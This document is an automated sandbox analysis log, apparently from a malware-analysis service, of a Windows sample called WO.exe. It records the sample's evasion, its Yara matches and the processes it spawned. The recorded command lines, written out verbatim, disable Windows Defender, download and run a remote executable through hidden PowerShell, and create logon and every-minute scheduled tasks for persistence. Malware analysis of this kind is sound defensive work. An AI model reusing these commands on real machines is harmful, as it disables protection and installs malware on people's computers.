                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5850
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3893
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3699
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6036
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8497
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 927
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8020
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1422
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4804
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2035
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5291
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1751
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7924
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1679
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4232
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2187
                                  Source: C:\Users\user\Desktop\WO.exe TID: 6948 | Thread sleep count: 245 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308 | Thread sleep count: 5850 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1544 | Thread sleep count: 3893 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2260 | Thread sleep time: -6456360425798339s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 | Thread sleep count: 3699 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 | Thread sleep count: 6036 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2332 | Thread sleep time: -21213755684765971s >= -30000s
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe TID: 4464 | Thread sleep count: 125 > 30
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe TID: 5928 | Thread sleep count: 124 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044 | Thread sleep count: 8497 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044 | Thread sleep count: 927 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800 | Thread sleep time: -4611686018427385s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048 | Thread sleep count: 8020 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048 | Thread sleep count: 1422 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196 | Thread sleep time: -2767011611056431s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308 | Thread sleep count: 4804 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308 | Thread sleep count: 2035 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068 | Thread sleep time: -2767011611056431s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184 | Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6356 | Thread sleep count: 5291 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6356 | Thread sleep count: 1751 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044 | Thread sleep time: -2767011611056431s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228 | Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe TID: 6356 | Thread sleep count: 84 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068 | Thread sleep count: 7924 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068 | Thread sleep count: 1679 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1236 | Thread sleep time: -4611686018427385s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6176 | Thread sleep count: 4232 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6176 | Thread sleep count: 2187 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228 | Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4192 | Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\Desktop\WO.exe | File opened: C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.tmp
                                  Source: C:\Users\user\Desktop\WO.exe | File opened: C:\Users\user\AppData\Local\
                                  Source: C:\Users\user\Desktop\WO.exe | File opened: C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp
                                  Source: C:\Users\user\Desktop\WO.exe | File opened: C:\Users\user\AppData\Local\Temp\4782.tmp
                                  Source: C:\Users\user\Desktop\WO.exe | File opened: C:\Users\user\AppData\
                                  Source: C:\Users\user\Desktop\WO.exe | File opened: C:\Users\user\
                                  Source: WO.exe, 00000012.00000002.1814337059.0000000000545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
                                  Source: reddit.exe, 00000035.00000002.2895884441.0000000000778000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                                  Source: reddit.exe, 00000006.00000002.2895876623.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, reddit.exe, 0000001B.00000002.2896012153.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, reddit.exe, 0000001C.00000002.2895946149.00000000005A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                                  Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

                                  HIPS / PFW / Operating System Protection Evasion

                                  Source: Yara match | File source: amsi64_2316.amsi.csv, type: OTHER
                                  Source: Yara match | File source: amsi64_6104.amsi.csv, type: OTHER
                                  Source: Yara match | File source: amsi64_4476.amsi.csv, type: OTHER
                                  Source: Yara match | File source: amsi64_4996.amsi.csv, type: OTHER
                                  Source: Yara match | File source: Process Memory Space: WO.exe PID: 6924, type: MEMORYSTR
                                  Source: Yara match | File source: Process Memory Space: WO.exe PID: 2476, type: MEMORYSTR
                                  Source: Yara match | File source: Process Memory Space: WO.exe PID: 6100, type: MEMORYSTR
                                  Source: Yara match | File source: Process Memory Space: WO.exe PID: 6156, type: MEMORYSTR
                                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat, type: DROPPED
                                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat, type: DROPPED
                                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat, type: DROPPED
                                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat, type: DROPPED
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Users\user\Desktop\WO.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe"
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "RunRedditMinute" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /f
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc config WinDefend start= disabled
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net stop WinDefend
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                  Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefend
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config WinDefend start= disabledJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop WinDefendJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /fJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /fJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop WinDefend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefend
                                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefend
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
